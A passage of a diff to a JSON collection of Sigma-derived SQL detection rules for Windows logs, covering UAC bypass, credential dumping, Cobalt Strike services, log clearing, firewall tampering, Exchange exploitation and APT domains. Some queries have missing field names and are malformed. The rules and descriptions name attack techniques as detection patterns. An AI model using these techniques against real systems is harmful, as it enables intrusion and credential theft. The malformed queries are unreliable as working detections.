Settings Changed", - "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", + "title": "Microsoft Defender Blocked from Loading Unsigned DLL", + "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", "status": "experimental", - "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", - "author": "Trent Liffick (@tliffick)", + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ - "Valid Macros and/or internal documents" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" ], - "filename": "registry_set_office_security.yml" + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" }, { - "title": "Bypass UAC Using SilentCleanup Task", - "id": "724ea201-6514-4f38-9739-e5973c34f49a", - "status": "test", - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "title": "Standard User In High Privileged Group", + "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", + "status": "experimental", + "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.credential_access", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND Details LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" ], - "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" + "filename": "win_lsa_server_normal_user_admin.yml" }, { - "title": "Disabled Windows Defender Eventlog", - "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", - "status": "experimental", - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "author": "Florian Roth (Nextron Systems)", + "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", + "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "status": "test", + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "author": "Jose Rodriguez @Cyb3rPandaH", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" ], - "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" }, { - "title": "DHCP Callout DLL Installation", - "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", - "status": "test", - "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "author": "Dimitrios Slamaris", + "title": "Failed MSExchange Transport Agent Installation", + "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "status": "experimental", + "description": "Detects a failed installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "registry_set_dhcp_calloutdll.yml" + "filename": "win_exchange_transportagent_failed.yml" }, { - "title": "CobaltStrike Service Installations in Registry", - "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", - "author": "Wojciech Lesicki", + "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", + "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "status": "experimental", + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "author": "Florian Roth (Nextron Systems), @testanull", "tags": [ - "attack.execution", - "attack.privilege_escalation", "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1210" ], "falsepositives": [ - "Unknown" + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((Details LIKE '%ADMIN$%' ESCAPE '\\' AND Details LIKE '%.exe%' ESCAPE '\\') OR (Details LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND Details LIKE '%start%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" ], - "filename": "registry_set_cobaltstrike_service_installs.yml" + "filename": "win_exchange_cve_2021_42321.yml" }, { - "title": "Wdigest Enable UseLogonCredential", - "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "title": "Remove Exported Mailbox from Exchange Webserver", + "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "status": "test", - "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" ], - "filename": "registry_set_wdigest_enable_uselogoncredential.yml" + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" }, { - "title": "VBScript Payload Stored in Registry", - "id": "46490193-1b22-4c29-bdd6-5bf63907216f", + "title": "Important Scheduled Task Deleted", + "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", "status": "experimental", - "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (Details LIKE '%vbscript:%' ESCAPE '\\' OR Details LIKE '%jscript:%' ESCAPE '\\' OR Details LIKE '%mshtml,%' ESCAPE '\\' OR Details LIKE '%RunHTMLApplication%' ESCAPE '\\' OR Details LIKE '%Execute(%' ESCAPE '\\' OR Details LIKE '%CreateObject%' ESCAPE '\\' OR Details LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (Details LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR Details LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "registry_set_vbs_payload_stored.yml" + "filename": "win_taskscheduler_susp_schtasks_delete.yml" }, { - "title": "Disable Microsoft Office Security Features", - "id": "7c637634-c95d-4bbf-b26c-a82510874b34", + "title": "GALLIUM Artefacts - Builtin", + "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", "status": "test", - "description": "Disable Microsoft Office Security Features by registry", - "author": "frack113", + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "author": "Tim Burrell", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" ], - "filename": "registry_set_disable_microsoft_office_security_features.yml" + "filename": "win_dns_analytic_apt_gallium.yml" }, { - "title": "Disable Security Events Logging Adding Reg Key MiniNt", - "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", - "status": "test", - "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", - "author": "Ilyas Ochkov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" - ], + "title": "New Firewall Exception Rule Added For A Suspicious Folder", + "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", + "status": "experimental", + "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", + "author": "frack113", "falsepositives": [ - "Unknown" + "Any legitimate application that runs from the AppData user directory" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND ((EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2'))) AND NOT ((ApplicationPath LIKE '%\\\\AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\')))" ], - "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + "filename": "win_firewall_as_add_rule_susp_folder.yml" }, { - "title": "PrinterNightmare Mimimkatz Driver Name", - "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", - "status": "test", - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "author": "Markus Neis, @markus_neis, Florian Roth", + "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", + "id": "79609c82-a488-426e-abcf-9f341a39365d", + "status": "experimental", + "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2033', '2059') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + ], + "filename": "win_firewall_as_delete_all_rules.yml" + }, + { + "title": "Sysmon Crash", + "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "status": "experimental", + "description": "Detects application popup reporting a failure of the Sysmon service", + "author": "Tim Shelton", "tags": [ - "attack.execution", - "attack.t1204", - "cve.2021.1675", - "cve.2021.34527" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" ], - "filename": "registry_event_mimikatz_printernightmare.yml" + "filename": "win_system_application_sysmon_crash.yml" }, { - "title": "DLL Load via LSASS", - "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", - "status": "test", - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "author": "Florian Roth (Nextron Systems)", + "title": "Important Windows Eventlog Cleared", + "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "status": "experimental", + "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1547.008" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" ], - "filename": "registry_event_susp_lsass_dll_load.yml" + "filename": "win_system_susp_eventlog_cleared.yml" }, { - "title": "Shell Open Registry Keys Manipulation", - "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "title": "DHCP Server Loaded the CallOut DLL", + "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "status": "test", - "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", - "author": "Christian Burkard (Nextron Systems)", + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "author": "Dimitrios Slamaris", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (Details = '(Empty)'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_event_shell_open_keys_manipulation.yml" + "filename": "win_system_susp_dhcp_config.yml" }, { - "title": "Creation of a Local Hidden User Account by Registry", - "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", - "status": "experimental", - "description": "Sysmon registry detection of a local hidden user account.", - "author": "Christian Burkard (Nextron Systems)", + "title": "DHCP Server Error Failed Loading the CallOut DLL", + "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "status": "test", + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "author": "Dimitrios Slamaris, @atc_project (fix)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_event_add_local_hidden_user.yml" + "filename": "win_system_susp_dhcp_config_failed.yml" }, { - "title": "OilRig APT Registry Persistence", - "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "title": "QuarksPwDump Clearing Access History", + "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "status": "test", - "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects QuarksPwDump clearing access history in hive", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "registry_event_apt_oilrig_mar18.yml" + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" }, { - "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", - "id": "55e29995-75e7-451a-bef0-6225e2f13597", - "status": "experimental", - "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", - "author": "Florian Roth (Nextron Systems)", + "title": "Zerologon Exploitation Using Well-known Tools", + "id": "18f37338-b9bd-4117-a039-280c81f7a596", + "status": "stable", + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "falsepositives": [ - "Unlikely" + "attack.t1210", + "attack.lateral_movement" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" ], - "filename": "registry_event_silentprocessexit_lsass.yml" + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" }, { - "title": "Windows Credential Editor Registry", - "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", + "title": "Vulnerable Netlogon Secure Channel Connection Allowed", + "id": "a0cb7110-edf0-47a4-9177-541a4083128a", "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" ], - "filename": "registry_event_hack_wce_reg.yml" + "filename": "win_system_vul_cve_2020_1472.yml" }, { - "title": "Suspicious Camera and Microphone Access", - "id": "62120148-6b7a-42be-8b91-271c04e281a3", - "status": "test", - "description": "Detects Processes accessing the camera and microphone from suspicious folder", - "author": "Den Iuzvyk", + "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", + "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "status": "experimental", + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" ], - "filename": "registry_event_susp_mic_cam_access.yml" + "filename": "win_system_kdcsvc_rc4_downgrade.yml" }, { - "title": "NetNTLM Downgrade Attack - Registry", - "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "title": "NTFS Vulnerability Exploitation", + "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + 